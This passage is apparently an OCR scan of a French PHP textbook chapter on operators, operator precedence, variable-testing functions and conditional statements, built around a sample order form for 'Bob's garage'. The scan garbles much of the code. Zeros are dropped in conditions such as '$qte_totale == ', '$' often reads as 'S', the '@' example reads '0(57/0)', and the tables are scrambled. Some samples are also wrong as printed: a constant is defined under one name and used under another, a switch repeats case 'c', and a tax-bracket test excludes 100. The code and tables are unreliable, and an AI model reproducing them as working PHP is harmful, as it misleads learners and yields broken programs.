sion complete est dans ce cas 4, c'est-a-dire la valeur qui est affichee. Cependant, une 
fois que l'instruction a ete executee, $a contient la valeur 5. 

L'operateur de decrementation ( ) a un comportement analogue, si ce n'est que la 
valeur de l'operande est decrementee au lieu d'etre incrementee. 

Operateur de reference 

L'operateur de reference & (esperluette) peut etre utilise avec l'operateur d' affectation. 
Normalement, lorsqu'une variable est affectee a une autre, l'interpreteur PHP effectue 
une copie de la premiere variable qu'il stocke quelque part dans la memoire de l'ordi- 
nateur. Par exemple, considerez les instructions suivantes : 

$a = 5; 
$b = $a; 
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Ces lignes de code conduisent a la creation d'une copie de $a et au stockage de cette 
copie dans $b. Par la suite, si la valeur de $a est modifiee, la valeur de $b restera 
inchangee : 

$a = 7; // $b vaut toujours 5 

L'operateur de reference & permet d'eviter de faire une copie, comme le montre l'exemple 
suivant : 

$a = 5; 
$b = &$a; 

$a = 7; // les variables $a et $b ont toutes les deux la valeur 7 

Les references peuvent etre un peu difficiles a comprendre, mais il suffit de considerer 
qu'une reference s'apparente a un alias plutot qu'a un pointeur. $a et $b pointent toutes 
deux vers la meme section de memoire, mais vous pouvez modifier cela en reinitialisant 
l'une d'elles comme ceci : 

unset ($a) ; 

Cette instruction ne change pas la valeur de $b (7) mais rompt le lien entre $a et la 
valeur 7 stockee en memoire. 

Operateurs de comparaison 

Les operateurs de comparaison servent a comparer deux valeurs entre elles. Les expres- 
sions contenant de tels operateurs renvoient les valeurs logiques true (vrai) ou false 
(faux), selon le resultat de la comparaison. 

Operateur d'egalite 

L'operateur d'egalite == (deux signes egal) permet de determiner si deux valeurs sont 
egales. Par exemple, nous pourrions utiliser 1' expression : 

$a == $b 

pour tester si les valeurs stockees dans $a et $b sont identiques. L'interpreteur PHP 
renvoie la valeur true si les valeurs sont egales et la valeur false si elles sont diffe- 
rentes. 

L'operateur d'egalite se confond facilement avec l'operateur d' affectation. Une telle 
confusion est d'autant plus dangereuse qu'elle ne provoque pas une erreur mais conduit 
simplement a un resultat qui n'est pas celui escompte. En effet, les valeurs non nulles 
sont generalement evaluees comme true tandis que les valeurs nulles sont evaluees 
comme false. Supposons que deux variables soient initialisees de la maniere suivante : 

$a = 5; 
$b = 7; 
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S'il est amend a tester l'expression $a = $b, l'interpreteur PHP renvoie la valeur true et 
la raison est facile a comprendre : la valeur de l'expression $a = $b est la valeur affectee 
a l'operande qui figure a gauche de l'operateur d' affectation, c'est-a-dire ici 7. Cette 
valeur etant non nulle, l'expression est evaluee comme true. Si votre intention initiale 
etait de tester l'expression $a == $b (au lieu de $a = $b), qui serait evaluee comme false 
par l'interpreteur PHP, vous avez introduit dans votre code une erreur logique qui peut se 
reveler tres difficile a detecter. Vous devez par consequent vous montrer tres prudent lors- 
que vous avez recours a l'operateur d'affectation ou a l'operateur d'egalite et verifier 
systematiquement que vous ne confondez pas ces deux operateurs. 

Cette confusion entre les operateurs d'affectation et d'egalite est tres courante et 
vous vous y heurterez probablement plusieurs fois au cours de votre carriere de 
programmeur. 

Autres operateurs de comparaison 

PHP comprend tout un jeu d'operateurs de comparaison. Ceux-ci sont decrits dans le 
Tableau 1.3. 

L'operateur d'identite (===) ne renvoie true que si ces deux operandes sont egaux et du 
meme type. Par exemple, 0=='0' sera vrai, mais 0=== ' ' ne le sera pas car l'un des 
zeros est un entier et 1' autre est une chaine. 



Tableau 1.3 : Operateurs de comparaison de PHP 



Operateur 


Nam 


Exemple 




Egal 


$a == $b 




Identique 


$a === $b 


l = 


Different 


$a != $b 


<> 


Different 


$a <> $b 


< 


Inferieur a 


$a < $b 


> 


Superieur a 


$a > $b 


<= 


Inferieur ou egal a 


$a <= $b 


>= 


Superieur ou egal a 


$a != $b 



Operateurs logiques 

Les operateurs logiques servent a combiner les resultats de conditions logiques. Par exem- 
ple, considerons le cas d'une variable $a dont la valeur est comprise entre et 100. Pour 
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verifier que la valeur de $a est bien situee dans cette plage, il nous faudrait tester les condi- 
tions $a >= et $a <= 1 00 en nous servant de l'operateur ET de la maniere suivante : 

$a >= && $a <=100 

Le langage PHP comprend les operateurs logiques ET, OU, OU EXCLUSIF et NON. 
Le Tableau 1.4 decrit ces differents operateurs. 



Tableau 1.4 : Operateurs logiques de PHP 



Operoteur 


Nom 


Exemple 


Resultat 


! 


NON 


!$b 


Renvoie true si $b est faux et vice versa. 


&& 


ET 


$a && $b 


Renvoie true lorsque $a et $b sont tous deux vrais ; sinon 
false. 


II 


OU 


Sa | | $b 


Renvoie true lorsque soit $a, soit $b est vrai et lorsque $a 
et $b sont tous les deux vrais ; sinon renvoie false. 


and 


ET 


$a and $b 


Identique a &&, mais avec une priorite plus basse. 


or 


OU 


$a or $b 


Identique a | | , mais avec une priorite plus basse. 


xor 


OU 

EXCLUSIF 


$a xor $b 


Renvoie true si $a ou Sb est vrai, mais pas les deux. 
Renvoie false si $a et $b valent tous les deux vrais ou 
tous les deux faux. 



Les operateurs and et or ont une priorite plus faible que celle des operateurs && et | | . Nous 
reviendrons sur la notion de priorite des operateurs un peu plus loin dans ce chapitre. 

Operateurs sur les bits 

Les operateurs sur les bits permettent de traiter les nombres entiers sous la forme de 
suites de bits utilisees pour les representer. 

Bien que ces operateurs soient peu utiles dans le contexte des programmes PHP, vous 
en trouverez une description exhaustive dans le Tableau 1.5. 



Tableau 1.5 : Operateurs bits a bits de PHP 



Operateur Nom 


Exemple 


Resultat 


& ET bit a bit 


$a & Sb 


Les bits positionnes a 1 dans $a et dans $b sont 
positionnes a 1 dans le resultat. 


| OU bit a bit 


$a | $b 


Les bits positionnes a 1 dans $a ou dans Sb sont 
positionnes a 1 dans le resultat. 


NON bit a bit 
(complement a un) 


~$a 


Les bits qui sont positionnes a 1 dans $a sont 
positionnes a dans le resultat, et vice versa. 
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Tableau 1.5 : Operateurs bits a bits de PHP (suite) 



Operateur Nom Exemple Resultat 



OUEXCLUSIF $a * Sb 
bit a bit 

« Decalage a gauche $a « $b 

» Decalage a droite $a » Sb 



Les bits positionnes a 1 dans $a ou $b, mais pas 
dans les deux, sont positionnes a 1 dans le resultat. 

Decale les bits de $a de $b positions vers la gauche. 

Decale les bits de $a de $b positions vers la droite. 



Autres operateurs 

Outre les operateurs decrits jusqu'ici, PHP dispose de plusieurs autres operateurs. 

L' operateur virgule (,) s'emploie pour separer les arguments d'une fonction ainsi que 
les elements d'une liste. II est generalement utilise a l'interieur de parentheses. 

Les deux operateurs speciaux new et > s'utilisent respectivement pour instancier une classe 
et pour acceder aux membres d'une classe. Nous les etudierons en detail au Chapitre 6. 

II existe encore trois autres operateurs, que nous allons brievement decrire dans les 
prochaines sous-sections. 

L 'operateur ternaire 

L' operateur ternaire ? : s' utilise de la maniere suivante : 

condition ? valeur si vraie : valeur si fausse 

II est done equivalent a la version expression de l'instruction if else (cette derniere 
est traitee plus loin dans ce chapitre). 

Voici un exemple simple d' application : 
($note > 50 ? 'Recu' : 'Recale'); 
Cette expression permet de determiner si les etudiants sont recus ou recales a leur examen. 

L 'operateur de suppression d'erreur 

L' operateur de suppression d'erreur @ peut s'utiliser devant n'importe quelle expression, 
e'est-a-dire devant tout ce qui produit ou contient une valeur. Soit l'instruction suivante : 

Sa = 0(57/0) ; 

En l'absence de l'operateur @, cette ligne de code produit un message d'erreur de division 
par zero. La presence de l'operateur @ evite l'affichage de ce message. 

Si vous utilisez l'operateur @, prevoyez du code de gestion des erreurs pour detecter les 
erreurs qui se produisent. Si vous avez configure PHP en activant le parametre 
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track errors, les messages d'erreur generes seront automatiquement stockes dans la 
variable globale $php errormsg. 

L'operateur d 'execution 

L'operateur d'execution se compose en fait d'une paire d'operateurs : ' ' , ou backticks. 
II s'agit la non pas d'une paire d'apostrophes simples mais d'apostrophes inversees. 

L'interpreteur PHP essaye d'executer tout ce qui est insere entre les deux apostrophes 
inversees comme une commande lancee sur la ligne de commande du serveur. La valeur 
de l'expression est alors le resultat de l'execution de la commande. 

Par exemple, sur un systeme d' exploitation de type Unix, vous pouvez ecrire : 

$out = 1 Is -la" ; 

echo '<pre>' .$out. '</pre>' ; 

ou, de la meme maniere, sur un serveur Windows : 

$out = "dir c: ' ; 

echo '<pre>' .$out. '</pre>' ; 

L'execution de chacun de ces fragments de code produit une liste du contenu du reper- 
toire et la stocke dans la variable $out. Celle-ci peut ensuite etre passee en parametre a la 
fonction echo pour un affichage dans le navigateur ou traitee d'une tout autre maniere. 

Au Chapitre 17, nous etudierons d'autres facons d'executer des commandes sur un 
serveur. 

Operateurs de tableau 

L'operateur [ ] permet d'acceder aux elements d'un tableau. On se sert egalement de 
l'operateur => dans certains contextes de tableau. Ces operateurs seront examines au 
Chapitre 3. 

Vous avez egalement acces a un certain nombre d'autres operateurs de tableau. Nous 
les presenterons en detail au Chapitre 3, mais ils sont inclus ici par souci d'exhaus- 
tivite. 



Tableau 1.6 : Operateurs de tableau de PHP 



Operateur Nom 


Utilisation 


Resultat 


+ Union 


$a + $b 


Renvoie un tableau contenant tout dans $a et $b. 


Egalite 


$a == $b 


Renvoie true si $a et $b possedent les memes elements. 


=== Identite 


$a === $b 


Renvoie true si $a et $b possedent les memes elements 






dans le meme ordre. 
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Tableau 1.6 : Operateurs de tableau de PHP 

Operateur Nom Utilisation Resultat 

! = Inegalite $a ! = Sb Renvoie true si $a et $b ne sont pas egaux. 

<> Inegalite $a <> Sb Renvoie true si $a et $b ne sont pas egaux. 

! == Non-identite $a ! == $b Renvoie true si $a et $b ne sont pas identiques. 



Vous remarquerez que les operateurs de tableau du Tableau 1.6 ont tous des opera- 
teurs equivalents qui fonctionnent avec les variables scalaires. Pour autant que vous 
vous souveniez que + opere une addition avec les types scalaires et une union avec les 
tableaux, les comportements devraient etre coherents. Vous ne pouvez pas comparer 
des tableaux a des types scalaires de maniere utile. 

L 'operateur de type 

II n'existe qu'un seul operateur de type : instanceof . Cet operateur est utilise dans la 
programmation orientee objet, mais nous le mentionnons ici par souci d'exhaustivite (la 
programmation orientee objet est presentee au Chapitre 6). 

instanceof vous permet de verifier si un objet est une instance d'une classe parti- 
culiere, comme dans cet exemple : 

class classeExemple{} ; 
SmonObjet = new classeExemple ( ) ; 
if (SmonObjet instanceof classeExemple) 
echo "monObjet est une instance de classeExemple"; 

Utilisation des operateurs : calcul des totaux d'un formulaire 

Maintenant que vous connaissez les operateurs du langage PHP, nous allons pouvoir 
calculer les totaux et la taxe du formulaire de commande de Bob. 

Pour cela, ajoutez le code suivant a la fin de votre script PHP : 
$qte_totale = 0; 

$qte_totale = $qte_pneus+ $qte_huiles+ $qte_bougies; 
echo 'Articles commandes : ' .$qte_totale . ' <br />'; 

$montant_total = 0.00; 

define( 'PRIX_PNEUS' , 100); 
define ( ' PRIX_HUILES ' , 10); 
define ( 'SPARKPRICE 1 , 4) ; 

$montant_total = $qte_pneus * PRIX_PNEUS 
+ $qte_huiles * PRIX_HUILES 
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+ $qte_bougies * PRIX_BOUGIES; 

echo 'Sous-total : '. number_format($montant_total, 2).'€<br />'; 

$taux_taxe= 0.10; // le taux de la taxe est de 10 % 

$montant_total = $montant_total * (1 + $taux_taxe) ; 

echo 'Total avec les taxes : ' . number_format ($montant_total, 2). 

'€<br />' ; 

Si vous actualisez la page dans votre navigateur, vous devriez obtenir un resultat 
comme celui de la Figure 1.5. 



^ ^ Le garage de Bob - Resultats de la... CD 

Le garage de Bob 
Resultats de la commande 

Commande traitee a 19:37, lc 6-10-2008 

Articles commandCs : 5 

Sous-total : 210.006 

Total avee les taxes : 231 ,00€ 



Termine 



Comme vous pouvez le constater, ce morceau de code fait intervenir plusieurs opera- 
teurs. Les operateurs d'addition (+) et de multiplication (*) y sont utilises pour calculer 
les montants, tandis que l'operateur de concatenation de chaines (.) sert a mettre en 
forme la sortie des donnees dans la fenetre du navigateur. 

Par ailleurs, nous faisons appel a la fonction number format ( ) pour mettre en forme les 
totaux sous forme de chaines a deux decimales. Cette fonction appartient a la bibliotheque 
mathematique de PHP. 

Si vous examinez attentivement les calculs effectues dans le dernier fragment de code 
ajoute a votre script, vous vous interrogerez peut-etre sur l'ordre dans lequel ces calculs 
sont effectues. Considerez par exemple l'instruction : 

$montant_total = $qte_pneus* PRIX_PNEUS 

+ $qte_huiles* PRIX_HUILES 
+ $qte_bougies * PRIX_B0UGIES; 

Le total obtenu semble correct (voir Figure 1.5), mais pourquoi les multiplications ont- 
elles ete effectuees avant les additions ? La reponse a cette question reside dans la 
notion de priorite des operateurs, e'est-a-dire dans l'ordre selon lequel l'interpreteur 
PHP evalue les operateurs. 



tigure /.i 

Les totaux de la 
commande client 
ont ete calcules, mis 
en forme et affiches. 
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Priorite et associativite des operateurs : ordre devaluation 
des expressions 

En general, chaque operateur est associe a un niveau de priorite qui determine l'ordre selon 
lequel cet operateur sera evalue dans une expression contenant plusieurs ope-rateurs. 

Les operateurs ont une autre propriete : 1' associativite, qui est l'ordre selon lequel des 
operateurs de meme priorite sont evalues. L' associativite d'un operateur peut etre definie 
de gauche a droite ou bien de droite a gauche, ou alors c'est qu'elle n'est pas pertinente. 

Le Tableau 1.7 decrit les priorites et les associativites des operateurs de PHP. 

Les operateurs de plus faible priorite sont en haut du tableau et la priorite des operateurs 
augmente a mesure que Ton descend dans le tableau. 

Tableau 1.7 : Priorites des operateurs de PHP 



Associativite 


Operateur 


de gauche a droite 


j 


de gauche a droite 


or 


de gauche a droite 


xor 


de gauche a droite 


and 


de droite a gauche 


print 


de gauche a droite 


= += =*=/=.= %=&=|=»= ~= «= »= 


de gauche a droite 


? : 


de gauche a droite 


II 


de gauche a droite 


&& 


de gauche a droite 


I 


de gauche a droite 




de gauche a droite 


& 


non pertinent 




non pertinent 


<<=>>= 


de gauche a droite 


<< >> 


de gauche a droite 


+ 


de gauche a droite 


* / % 


de droite a gauche 


! - ++ (int) (double) (string) (array) (object) @ 


de droite a gauche 


[] 


non pertinent 


new 


non pertinent 
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Notez que nous n'avons pas encore etudie l'operateur de plus forte priorite : la tradi- 
tionnelle paire de parentheses. Celle-ci s'utilise pour renforcer la priorite d'une partie 
d'une expression, afin de forcer son evaluation et de contourner les regies de priorite 
des operateurs. 

Considerez 1' instruction qui suit, tiree du dernier exemple etudie : 

$montant_total = $montant_total * (1 + $taux_taxe) ; 
Si nous avions ecrit : 

$montant_total = $montant_total * 1 + $taux_taxe; 

l'operateur de multiplication aurait ete evalue en premier puisque sa priorite est plus 
forte que celle de l'operateur d'addition. Le resultat obtenu aurait alors ete incorrect. En 
utilisant des parentheses, nous pouvons contraindre l'interpreteur PHP a evaluer en 
premier la sous-expression 1 + $taux taxe. 

Vous pouvez inserer dans une expression autant de paires de parentheses que neces- 
saire. Le jeu de parentheses le plus interne est evalue en premier. 

Notez egalement la presence dans ce tableau d'un autre operateur que nous n'avons pas 
encore couvert : l'instruction print, qui equivaut a echo. 

Nous utiliserons generalement echo dans ce livre, mais vous pouvez utiliser print si 
vous le trouvez plus lisible. print et echo ne sont ni l'un ni 1' autre veritablement des 
fonctions mais peuvent tous deux etre appeles comme des fonctions avec des parametres 
entre parentheses. Tous les deux peuvent egalement etre traites comme des operateurs : il 
suffit de placer la chaine a afficher apres le mot-cle echo ou print. 

Le fait d'appeler print comme une fonction l'amene a renvoyer une valeur (1), ce qui 
peut se reveler utile si vous souhaitez produire une sortie a l'interieur d'une expression 
plus complexe, mais cela signifie que print est un peu plus lent que echo. 

Fonctions sur les variables 

Avant d'en terminer avec les variables et les operateurs, nous devons encore examiner 
les fonctions sur les variables. II s'agit d'une bibliotheque de fonctions permettant de 
manipuler et de tester les variables de differentes manieres. 

— Info 

Ce livre ainsi que la documentation de php.net font reference au type de donnees mixed. Ce 
type de donnees n'existe pas mais, PHP etant caracterise par une extreme souplesse pour les 
types de donnees, de nombreuses fonctions acceptent plusieurs types de donnees (quand ce 
n'est pas tous) comme argument. Lorsque Ton peut employer des arguments de plusieurs 
types de donnees, nous le signalons par le type mixed. 
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Test et definition des types de variables 

La plupart des fonctions de variables s'utilisent pour tester le type des variables. 

Les deux fonctions de variables les plus generales sont gettype() et settype(). Les 
prototypes de ces fonctions (c'est-a-dire les descriptions des arguments qu'elles attendent 
et des valeurs qu'elles renvoient) sont les suivants : 

string gettype (mixed var); 

bool settype (mixed var, chaine type); 

gettype ( ) s'emploie en lui passant une variable. La fonction determine alors le type de 
la variable et renvoie une chaine contenant le nom du type : bool, int, double, string, 
array, ob j ect, resource ou NULL. Elle renvoie unknown type s'il ne s'agit pas d'un des 
types PHP standard. 

Pour utiliser settype ( ), il faut passer a la fonction la variable dont le type doit etre 
modifie, ainsi qu'une chaine contenant le nom du nouveau type a appliquer a la variable 
(voir la liste donnee dans le paragraphe precedent). Voici des instructions illustrant 
1' usage de ces deux fonctions de variables : 

$a = 56; 

echo gettype($a) . ' <br> ' ; 
settype($a, 'double'); 
echo gettype($a) . '<br>' ; 

Lors du premier appel de la fonction gettype (), la variable $a est de type entier ( int ) . 
Apres l'appel de settype ( ), $a est du type double. 

PHP fournit egalement des fonctions testant un certain type de variable. Chacune 
de ces fonctions prend une variable comme argument et retourne soit true, soit false. 
Ces fonctions sont les suivantes : 

■ is array(). 

■ is double (), is float (), is real () (la meme fonction). 

■ is long (), is int(),is integer () (la meme fonction). 

■ is string(). 

■ is bool(). 

■ is object(). 

■ is resource(). 

■ is null(). 

■ is scalar ( ) . Teste si la variable est scalaire (entier, booleen, chaine ou double). 

■ is numeric ( ) . Teste si la variable est un nombre ou une chaine numerique. 

■ is callable ( ) . Teste si la variable est le nom d'une fonction valide. 
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Test de I'etat d'une variable 

PHP fournit plusieurs fonctions pour tester I'etat d'une variable. 

La premiere de ces fonctions est isset ( ) , dont le prototype est le suivant : 

bool isset(mixed var[, mixed var[, ...]]); 

Cette fonction prend un nom de variable comme argument et renvoie true si la variable 
existe et false dans le cas contraire. Vous pouvez egalement passer une liste de variables 
separees par des virgules et isset ( ) renverra true si toutes les variables sont defmies. 

Vous pouvez supprimer une variable au moyen de la fonction unset ( ) , qui fait pendant 
a la fonction isset (). La fonction unset ( ) a le prototype suivant : 

void unset(mixed var[, mixed var[, ...]]); 

La fonction unset ( ) supprime la ou les variables qui lui sont passees en parametre. 

La fonction empty ( ) determine si une variable existe et contient une valeur non vide et non 
nulle. Elle renvoie true ou false selon le resultat obtenu. Son prototype est le suivant : 

bool empty(mixed var); 

Examinons un exemple utilisant ces trois fonctions. Tapez les lignes suivantes a la fin 
de votre script : 

echo ' isset ($qte_pneus) : '. isset ($qte_pneus) .' <br />'; 

echo ' isset ($absent) : ' .isset($absent) . ' <br />'; 

echo ' empty ($qte_pneus) : ' .empty($qte_pneus) . '<br />'; 

echo ' empty ($absent) : ' .empty($absent) . '<br />'; 

Actualisez la page dans votre navigateur pour observer le resultat produit par cette serie 
d'instructions. 

La fonction isset ( ) appliquee a la variable $qte pneus devrait retourner la valeur 1 
(true), quelle que soit la valeur saisie dans le champ de formulaire associe a cette 
variable. Le resultat retourne par la fonction empty ( ) appliquee a cette variable depend 
en revanche de la valeur saisie (ou non saisie) dans le champ de formulaire. 

La variable $absent n'existant pas, la fonction isset ( ) appliquee a ce nom de varia- 
ble retourne un resultat vide (false), tandis que la fonction empty ( ) renvoie 1 (true). 

Ces fonctions se revelent done tres pratiques pour determiner si l'utilisateur du formu- 
laire a ou non rempli les champs qui lui sont proposes. 

Reinterpretation des variables 

PHP met a votre disposition des fonctions qui permettent de mettre en ceuvre 1' equivalent 
d'un transtypage des variables. Voici trois fonctions permettant de realiser cette operation : 

int intval(mixed var[, int base]); 
float f loatval(mixed var); 
string strval(mixed var) ; 
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Chacune de ces fonctions prend une variable en parametre et renvoie la valeur de cette 
variable apres avoir realise sa conversion dans le type approprie. La fonction intval( ) 
peut egalement vous permettre de specifier la base pour la conversion lorsque la varia- 
ble a convertir est une chaine (vous pouvez ainsi convertir des chames hexadecimales 
en entiers, par exemple). 

Structures de controle 

Dans un langage de programmation, les structures de controle permettent de controler 
le flux d'execution au sein d'un programme ou d'un script. Les structures de controle 
peuvent etre classees en deux groupes : les structures conditionnelles (ou de branche- 
ment) et les structures de repetition, ou boucles. Les sections qui suivent sont consacrees a 
l'etude de chacune de ces structures en PHP. 

Prise de decision avec des structures conditionnelles 

Pour qu'un programme reponde pertinemment a son utilisateur, il faut qu'il soit capable 
de prendre des decisions. Les constructions d'un programme qui indiquent qu'une 
decision doit etre prise sont appelees "structures conditionnelles". 

Instructions if 

Nous pouvons utiliser une structure if pour prendre une decision. Pour cela, nous 
devons specifier une condition. Si la condition est vraie, le bloc de code qui la suit 
est execute. Les conditions des instructions if doivent etre specifiees entre paren- 
theses ( ) . 

Par exemple, si le formulaire de commande en ligne de l'entreprise de Bob est renvoye 
par un client sans aucun article commande, c'est sans doute que le client a actionne par 
inadvertance le bouton "Passer commande" avant d' avoir fini de remplir le formulaire. 
Au lieu d'afficher le message "Commande traitee", le navigateur pourrait alors produire 
un texte plus approprie, comme "Votre commande ne contient aucun article !". 
Laffichage d'un tel avertissement s'implemente tres facilement au moyen d'une 
instruction if : 

if( $qte_totale == ) 

echo 'Votre commande ne contient aucun article !<br />'; 

La condition utilisee ici est $qte totale == 0. Rappelez-vous que l'operateur d'egalite 
(==) est different de l'operateur d' affectation (=). 

La condition $qte totale == est vraie si la variable $qte totale est egale a zero. Si 
$qte totale est differente de zero, la condition est fausse. Lorsque la condition est 
evaluee comme vraie (true), l'instruction echo est executee. 
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Blocs de code 

Dans les structures conditionnelles telles qu'une structure if, il est souvent necessaire 
d'executer plusieurs instructions. Dans ce cas, vous n'avez pas besoin de placer une 
nouvelle instruction if avant chaque instruction a executer : il suffit de regrouper les instruc- 
tions de maniere a former un bloc. Pour declarer un bloc, encadrez-le par des accolades : 

if( == $qte_totale ) 
{ 

echo '<p style="color:red">' ; 

echo 'Votre commande ne contient aucun article ! ' ; 
echo ' </p> ' ; 

} 

Les trois lignes de code placees ici entre accolades forment un bloc de code. Lorsque la 
condition est evaluee comme vraie, tout le bloc (c'est-a-dire les trois lignes qui le consti- 
tuent) est execute. Lorsque la condition se revele fausse, le bloc est integralement 
ignore par l'interpreteur PHP. 

— Info 

Comme nous I'avons deja mentionne, l'interpreteur PHP ignore la mise en forme du code. II 
est par consequent fortement recommande d'indenter votre code pour en ameliorer la lisi- 
bilite. Des mises en retrait judicieuses permettent de discerner d'un seul coup d'ceil les lignes 
des structures conditionnelles qui sont executees lorsque les conditions sont satisfaites, les 
instructions qui sont regroupees en blocs et les instructions qui font partie de boucles ou de 
fonctions. Dans les exemples precedents, I'instruction qui depend de I'instruction if et les 
instructions qui constituent le bloc sont indentees. 

Instructions else 

Souvent, il ne suffit pas de decider qu'une action doit etre accomplie : il faut aussi choisir 
celle qui, parmi un ensemble d' actions, doit etre executee. 

Une instruction else permet de specifier une action alternative a accomplir lorsque la 
condition specifiee dans une instruction if se revele fausse. Dans l'exemple de l'entre- 
prise de Bob, il est necessaire d'alerter les clients s'ils transmettent une commande 
vide. Par ailleurs, s'ils soumettent une commande valide, il faut leur renvoyer un recapitu- 
latif de leur commande, pas un message d'avertissement. 

Pour presenter aux clients soit une alerte, soit un recapitulatif, nous pouvons introduire 
une instruction else dans notre code, comme suit : 

if( $qte totale == ) 
{ 

echo 'Votre commande ne contient aucun article !<br>'; 

} 

else 
{ 

echo $qte_pneus . ' pneus<br>'; 

echo $qte_huiles .' bidons d\ ' huile<br> ' ; 

echo $qte_bougies . ' bougies<br> ' ; 

} 
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Vous pouvez ainsi construire des processus logiques complexes en imbriquant des 
instructions if les unes dans les autres. Dans le code qui suit, le message d'avertissement 
ne s'affichera que lorsque la condition $qte totale == est evaluee comme vraie et 
chaque ligne de ce recapitulatif ne sera produite que si sa propre condition est vraie. 

if( $qte_totale == 0) 
{ 

echo 'Votre commande ne contient aucun article !<br>'; 

} 

else 
{ 

if ( $qte_pneus > ) 

echo $qte_pneus . ' pneus<br>'; 
if ( $qte_huiles > ) 

echo $qte_huiles . ' bidons d\ ' huile<br> ' ; 
if ( $qte_bougies > ) 

echo $qte_bougies . ' bougies<br> 1 ; 

} 

Instructions elseif 

Dans bon nombre de situations de prise de decision, vous devez choisir entre plus de 
deux possibility's . L'instruction elseif permet alors de creer une suite de plusieurs 
options ; c'est une combinaison d'une instruction else et d'une instruction if. Lorsque 
Ton precise une suite de conditions, le programme peut tester chaque condition, jusqu'a 
en trouver une qui soit vraie. 

Pour les grosses commandes de pneus, Bob accorde des remises a ses clients. Le prin- 
cipe de ces remises est le suivant : 

■ moins de 10 pneus achetes, aucune remise ; 

■ 10-49 pneus achetes, 5 % de remise ; 

■ 50-99 pneus achetes, 10 % de remise ; 

■ 100 pneus achetes ou plus, 15 % de remise. 

Nous pouvons ecrire le code pour calculer la remise accordee en utilisant des conditions et 
des instructions if et elseif, ainsi que l'operateur ET (&&) pour combiner deux conditions : 

if( $qte_pneus < 10 ) 

$remise = 0; 
elseif ( $qte_pneus >= 10 && $qte_pneus <= 49 ) 

$remise = 5; 
elseif ( $qte_pneus>= 50 && $qte_pneus <= 99 ) 

$remise = 10; 
elseif ( $qte_pneus > 100 ) 

$remise = 15; 

Notez que vous pouvez indifferemment ecrire elseif ou else if (avec ou sans espace 
intermediaire). 

Dans cette cascade d'instructions elseif, une seule instruction (ou un seul bloc 
d'instruction) sera executee. Ce point n'a pas d'importance dans ce cas precis parce que 
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les differentes conditions specifiees s'excluent mutuellement les unes des autres (une 
seule est vraie a un moment donne). En revanche, lorsque plusieurs conditions d'un 
ensemble peuvent etre vraies simultanement, seule 1' instruction (ou le bloc d' instructions) 
qui suit la premiere condition evaluee comme vraie sera executee. 



Instructions switch 

Une instruction switch est comparable a une instruction if, si ce n'est qu'elle permet 
d'implementer une condition susceptible de prendre plus de deux valeurs differentes. 
Dans une instruction if, la condition peut etre evaluee soit comme vraie, soit comme 
fausse alors qu'avec une instruction switch la condition peut prendre differentes 
valeurs, pourvu qu'elles soient toutes du meme type (entier, chaine ou double). Vous 
devez alors faire appel a une instruction case pour gerer chaque valeur possible de la 
condition et ajouter, eventuellement, un cas par defaut pour prendre en compte toutes 
les situations qui ne correspondent a aucune des instructions case. 

Bob aimerait connaitre la forme de publicite qui se revele la plus profitable a son 
commerce. A cette fin, il souhaite inclure un sondage dans le formulaire de commande. 

Inserez ce code HTML dans votre formulaire de commande et vous obtiendrez le resultat 
montre a la Figure 1.6 : 

<tr> 

<td>Comment avez-vous eu connaissance de notre site ?</td> 
<td><select name="trouver"> 



<option value 
<option value 
<option value 
<option value 
</select> 
</td> 
</tr> 

Figure 1.6 

Le formulaire de 
commande demande 
aux visiteurs comment 
its ont connu le site de 
Bob. 



"a">Client regulier</option> 
"b">Par un spot publicitaire</option> 
"c">Dans un annuaire telephonique</option> 
"d">Par un ami</option> 



Le garage de Bob 



Le garage de Bob 



Formulaire de commande 



Articles 

Pneus 
Huiles 
Bougies 

CoETimeiit avcz-vous 
cu connaissance dc 
notre siic ? 



Quantity 



Par hasard 

Par un spot publicitaire 



Par ur on" 
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Ce code HTML ajoute la variable de formulaire trouver, qui peut prendre les valeurs 
"a", "b", "c" ou "d". Son traitement en PHP pourrait s'effectuer au moyen d'une serie 
d' instructions if et elseif , comme ici : 

if ($trouver == 'a' ) 

echo '<P>Client regulier.</P>' ; 
elseif ($trouver == 'b') 

echo '<P>Client attire par un spot TV. </P>'; 
elseif ($trouver == 'c') 

echo '<P>Client attire par un annuaire telephonique. </P>'; 
elseif ($trouver == 'd') 

echo '<P>Client attire par un ami. </P>'; 
else 

echo ' <P>Impossible de savoir comment ce client nous a 
trouves.</P>' ; 

Nous pourrions egalement parvenir au meme resultat avec une instruction switch : 

switch ($trouver) 
{ 

case 'a' : 

echo '<P>Client regulier. </P>'; 

break; 
case 'b' : 

echo '<P> Client attire par un spot TV. </P>'; 
break; 
case 'c' : 

echo '<P>Client attire par un annuaire telephonique. </P>'; 
break; 
case 'c' : 

echo '<P>Client attire par un ami. </P>'; 
break; 
default : 

echo 1 <P>Impossible de savoir comment ce client nous a 
trouves.</P>' ; 

break; 

} 

Ces deux exemples supposent que vous ayez extrait $trouver du tableau $ POST. 

Une instruction switch se comporte un peu differemment d'une instruction if ou d'une 
instruction elseif. Une instruction if n'affecte qu'une seule instruction, a moins qu'un 
bloc de code n'ait ete deliberement cree avec une paire d' accolades. Une instruction 
switch a le comportement inverse : lorsqu'une instruction case d'une structure switch 
est activee, l'interpreteur PHP execute les instructions qui suivent jusqu'a rencontrer 
une instruction break. En l'absence d'instruction break, une structure switch conduit a 
l'execution de tout le code succedant a l'instruction case evaluee comme vraie. Lors- 
que l'interpreteur PHP atteint une instruction break, il execute la ligne de code qui suit 
la structure switch. 
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Comparaison des differentes structures conditionnelles 

Pour le debutant, le choix entre les differentes structures conditionnelles disponibles 
peut se reveler ardu. 

Le choix de l'une ou de 1' autre est, en effet, assez delicat puisque tout processus qui 
peut etre implements au moyen d' instructions else, elseif ou switch peut egalement 
l'etre au moyen d'une serie d' instructions if. Essayez d'adopter la structure condition- 
nelle qui soit la plus lisible dans le contexte du probleme traite. C'est ensuite l'expe- 
rience qui vous permettra de trouver les reponses les plus appropriees. 

Structures de repetition : iterations 

Les ordinateurs sont particulierement appreciables lorsqu'il s'agit d'accomplir de 
maniere automatique des taches repetitives. Si une action doit etre entreprise de la 
meme maniere plusieurs fois de suite, vous pouvez utiliser une boucle pour repeter 
l'execution d'un meme fragment de code au sein d'un programme. 

Bob veut afficher un tableau donnant le cout d'expedition de la commande, qui sera 
ajoute a la commande du client. Ce cout d'expedition depend de la distance parcourue 
par la commande entre 1' entrepot et le client et peut etre calcule par une simple formule. 
Le resultat recherche est montre a la Figure 1.7. 



Mozilla Firefox 

pn^> ©CD (U^ZXFq) (g) 

Distance Coflt 
50 5 
100 10 
150 15 
200 20 
250 25 



